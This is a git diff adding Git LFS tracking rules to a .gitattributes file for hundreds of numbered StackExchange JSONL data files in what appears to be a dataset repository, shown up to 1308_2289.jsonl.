diff --git a/.gitattributes b/.gitattributes index f17e700e480835ad0d9a2e78b2ff9f74e701adff..ea1ee0e39a519b4fd71b4438e42662b98e8984ae 100644 --- a/.gitattributes +++ b/.gitattributes @@ -17019,3 +17019,2292 @@ data/stackexchange/6-10/3_6.jsonl filter=lfs diff=lfs merge=lfs -text data/stackexchange/6-10/4_6.jsonl filter=lfs diff=lfs merge=lfs -text data/stackexchange/6-10/5_6.jsonl filter=lfs diff=lfs merge=lfs -text data/stackexchange/6-10/6_6.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/0_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1000_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1001_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1002_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1003_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1004_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1005_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1006_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1007_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1008_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1009_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/100_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1010_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1011_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1012_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1013_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1014_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1015_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1016_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1017_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1018_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1019_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/101_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1020_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1021_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1022_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1023_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1024_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1025_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1026_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1027_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1028_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1029_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/102_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1030_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1031_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1032_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1033_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1034_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1035_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1036_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1037_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1038_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1039_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/103_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1040_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1041_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1042_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1043_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1044_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1045_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1046_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1047_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1048_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1049_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/104_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1050_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1051_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1052_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1053_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1054_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1055_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1056_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1057_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1058_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1059_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/105_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1060_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1061_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1062_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1063_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1064_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1065_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1066_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1067_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1068_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1069_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/106_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1070_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1071_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1072_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1073_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1074_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1075_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1076_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1077_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1078_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1079_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/107_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1080_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1081_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1082_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1083_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1084_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1085_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1086_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1087_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1088_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1089_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/108_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1090_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1091_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1092_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1093_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1094_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1095_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1096_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1097_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1098_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1099_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/109_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/10_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1100_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1101_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1102_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1103_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1104_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1105_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1106_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1107_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1108_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1109_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/110_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1110_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1111_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1112_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1113_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1114_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1115_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1116_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1117_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1118_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1119_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/111_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1120_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1121_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1122_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1123_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1124_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1125_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1126_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1127_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1128_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1129_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/112_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1130_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1131_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1132_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1133_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1134_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1135_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1136_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1137_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1138_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1139_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/113_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1140_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1141_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1142_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1143_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1144_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1145_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1146_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1147_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1148_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1149_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/114_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1150_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1151_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1152_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1153_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1154_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1155_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1156_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1157_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1158_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1159_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/115_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1160_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1161_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1162_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1163_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1164_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1165_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1166_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1167_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1168_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1169_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/116_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1170_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1171_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1172_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1173_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1174_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1175_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1176_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1177_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1178_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1179_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/117_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1180_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1181_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1182_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1183_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1184_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1185_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1186_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1187_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1188_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1189_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/118_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1190_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1191_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1192_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1193_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1194_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1195_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1196_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1197_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1198_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1199_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/119_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/11_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1200_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1201_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1202_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1203_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1204_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1205_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1206_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1207_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1208_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1209_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/120_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1210_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1211_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1212_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1213_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1214_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1215_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1216_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1217_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1218_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1219_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/121_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1220_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1221_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1222_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1223_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1224_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1225_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1226_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1227_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1228_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1229_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/122_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1230_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1231_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1232_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1233_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1234_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1235_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1236_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1237_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1238_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1239_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/123_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1240_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1241_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1242_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1243_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1244_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1245_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1246_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1247_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1248_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1249_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/124_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1250_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1251_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1252_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1253_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1254_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1255_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1256_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1257_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1258_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1259_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/125_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1260_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1261_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1262_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1263_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1264_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1265_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1266_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1267_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1268_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1269_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/126_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1270_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1271_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1272_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1273_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1274_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1275_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1276_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1277_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1278_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1279_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/127_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1280_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1281_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1282_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1283_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1284_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1285_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1286_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1287_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1288_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1289_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/128_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1290_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1291_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1292_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1293_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1294_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1295_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1296_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1297_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1298_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1299_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/129_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/12_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1300_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1301_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1302_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1303_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1304_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1305_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1306_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1307_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1308_2289.jsonl filter=lfs diff=lfs merge=lfs -text 